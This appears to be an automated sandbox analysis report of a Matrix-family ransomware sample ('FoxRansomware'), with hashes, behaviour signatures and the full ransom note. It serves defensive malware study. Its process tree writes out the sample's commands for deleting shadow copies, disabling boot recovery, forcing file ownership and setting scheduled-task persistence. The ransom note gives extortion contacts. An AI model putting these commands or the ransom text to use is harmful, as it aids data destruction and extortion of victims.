Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13-02-2024 05:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 250A73C848E74C58\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 250A73C848E74C58\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 CDrF6jFT\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe"
      2⤵
        PID:3052
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2700
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Amb2lQhd.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:560
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2468
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2160
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:2496
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
              PID:3656
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Run /I /tn DSHCA
                5⤵
                  PID:2136
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\goa4rOzf.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\goa4rOzf.bmp" /f
              3⤵
              • Sets desktop wallpaper using registry
              PID:784
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
              3⤵
                PID:2652
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
                3⤵
                  PID:3008
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\h1JAkYNr.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2264
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
                  3⤵
                  • Views/modifies file attributes
                  PID:976
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
                  3⤵
                    PID:2300
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
                    3⤵
                    • Modifies file permissions
                    PID:1788
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:2440
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\cIAicoUd.exe
                      cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:2784
                      • C:\Users\Admin\AppData\Local\Temp\cIAicoUd64.exe
                        cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3380
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {7392793C-6BFE-42DC-BE69-ECA911E4658B} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
                1⤵
                  PID:3052
                  • C:\Windows\SYSTEM32\cmd.exe
                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat"
                    2⤵
                      PID:3184
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        3⤵
                        • Interacts with shadow copies
                        PID:3076
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic SHADOWCOPY DELETE
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1632
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                        3⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3316
                        • C:\Windows\system32\vssadmin.exe
                          "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • Interacts with shadow copies
                          PID:2852
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} recoveryenabled No
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:2496
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Delete /TN DSHCA /F
                        3⤵
                          PID:3420
                        • C:\Windows\system32\bcdedit.exe
                          bcdedit /set {default} bootstatuspolicy ignoreallfailures
                          3⤵
                          • Modifies boot configuration data using bcdedit
                          PID:2892
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1232

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf
                      Filesize

                      8KB

                      MD5

                      6fbf6ad4ea5d6e03bc22e928f049a490

                      SHA1

                      1289802177286d07db398199827080ed69f3cfb7

                      SHA256

                      88830da0b8297443b3deb5e8956497019f6de89dbb42b0c6bdaaa111a727f77d

                      SHA512

                      ba8d8656165a5327bf5a066785957324b0eb96f28bc3c2c3824c1d8230792143a02d95cee6dff0c819ae2027cd51d01641c8aeb261a726fe4323d65b0c1516bf

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Amb2lQhd.txt
                      Filesize

                      14B

                      MD5

                      c74dacdd9331a6698efffe81ff66ac08

                      SHA1

                      79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

                      SHA256

                      82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

                      SHA512

                      24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe
                      Filesize

                      1.2MB

                      MD5

                      907636b28d162f7110b067a8178fa38c

                      SHA1

                      048ae4691fe267e7c8d9eda5361663593747142a

                      SHA256

                      6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                      SHA512

                      501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\cIAicoUd.exe
                      Filesize

                      181KB

                      MD5

                      2f5b509929165fc13ceab9393c3b911d

                      SHA1

                      b016316132a6a277c5d8a4d7f3d6e2c769984052

                      SHA256

                      0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                      SHA512

                      c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_250A73C848E74C58.txt
                      Filesize

                      54KB

                      MD5

                      e7f188677e8633f67a46c1c89a1dbe72

                      SHA1

                      b4e2c62ee56a5ac9fb2667b081bc8223d68fb450

                      SHA256

                      b46aed5cfebfd676433d0197fdbc0c6b6c0ab118ec21676153a4a242ea6b8303

                      SHA512

                      89ea7d06e341291ef38a98d46337d57283d8f7e7d9cc199e3a3fbfd61a4cc28df823049e75cac26c492f2c2a99b4d46bff56ba9b8dd2e0b2d4b61c899a7226ab

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\h1JAkYNr.bat
                      Filesize

                      246B

                      MD5

                      2d85adf113db0ac9214aff722a60b6d2

                      SHA1

                      0181fa1a8d3abd5be3f4326e0abad138e9541f58

                      SHA256

                      9bb51e333f60a076236c2e444549963020b737b09773049cbe738c3251cdd4be

                      SHA512

                      6100b035460475edcf2e4b9b2b16b013b3898a72af0605764eb672266151a39c8559e7cc04dc0cf445417399e80769dcaa8b43dc264317fa85ac2720922d6f9c

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat
                      Filesize

                      415B

                      MD5

                      96508db6b3b23d103267541d9895aa70

                      SHA1

                      21666fd18ea5ac56f3d5efb11306376ed0e8ab85

                      SHA256

                      eb5844b4e1122b48776548b85e34e7283c4e226d10e8904f963fa5f2bdb14e5b

                      SHA512

                      a7f6237bbfc42b5b8304fc3770058380c8624168ded1e5459de099c7c5b1463ba971b6fbcd83f688e6170ce6a949e7200b0b78c5433926a26d48a85e4c195a02

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6NEXW3IM1ARCHDGCVIH8.temp
                      Filesize

                      7KB

                      MD5

                      5c5575ab5f758dcd5aaf42254630e785

                      SHA1

                      c151fdae808affcd3100a5df938d3daeebe26b28

                      SHA256

                      10cacd6037deff03c8afff527d70bae8fb04cb2ea647f354abf0ad93d62a7b43

                      SHA512

                      e5891b61cb073c7f0cbef10fb9323543e3799450fb243c0b7eba9f7a1518d20000d0dffeaa37519634841fb429c616fc10e1a5c2f5aec006eaa51a72b2606897

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs
                      Filesize

                      260B

                      MD5

                      96c135025ee40d98f537ac76b3a4ca90

                      SHA1

                      acc32ca642fcf5ac2cccf671a3cc917f5d0c2ecd

                      SHA256

                      93e7aa86b6164018a888f353c5ddd8c7833bee7bff1d17384c67c89b23851560

                      SHA512

                      2617d2da935c89905389b26a643a7742e661ae56c7a2e15a4350904033b8a3d30021e1ce57da84e7b2767ffae0c5edfb58ccf37b2491fa415e9416bcb42424a7

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\cIAicoUd64.exe
                      Filesize

                      221KB

                      MD5

                      3026bc2448763d5a9862d864b97288ff

                      SHA1

                      7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                      SHA256

                      7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                      SHA512

                      d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                      Download Submit

                    • memory/560-13-0x00000000027F0000-0x0000000002830000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/560-15-0x00000000027F0000-0x0000000002830000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/560-14-0x00000000027F0000-0x0000000002830000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/560-12-0x0000000073FF0000-0x000000007459B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/560-17-0x0000000073FF0000-0x000000007459B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/560-11-0x0000000073FF0000-0x000000007459B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/2184-16-0x0000000000400000-0x000000000053B000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2184-7079-0x0000000000400000-0x000000000053B000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2184-14480-0x0000000000400000-0x000000000053B000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2184-14633-0x0000000000400000-0x000000000053B000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2440-1674-0x0000000000120000-0x0000000000197000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2440-14634-0x0000000000120000-0x0000000000197000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2700-8-0x0000000000400000-0x000000000053B000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2784-1733-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/3316-14640-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/3316-14641-0x0000000002290000-0x0000000002298000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/3316-14642-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/3316-14643-0x0000000002A60000-0x0000000002AE0000-memory.dmp

                      Filesize

                      512KB

                      Download

